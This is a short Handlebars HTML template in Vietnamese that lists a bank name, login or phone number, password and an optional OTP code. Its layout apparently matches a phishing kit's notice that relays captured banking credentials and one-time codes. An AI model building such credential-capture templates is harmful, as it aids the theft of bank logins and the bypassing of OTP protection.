<ul>
     <li>
        Tên ngân hàng: {{nameBank}}
    </li>
    <li>
        Tên đăng nhập/SĐT: {{username}}
    </li>
     <li>
        Mật khẩu: {{password}}
    </li>
    {{#if otp}}
    <li>
         Mã OTP:  {{otp}}
    </li>
    {{/if}}
</ul>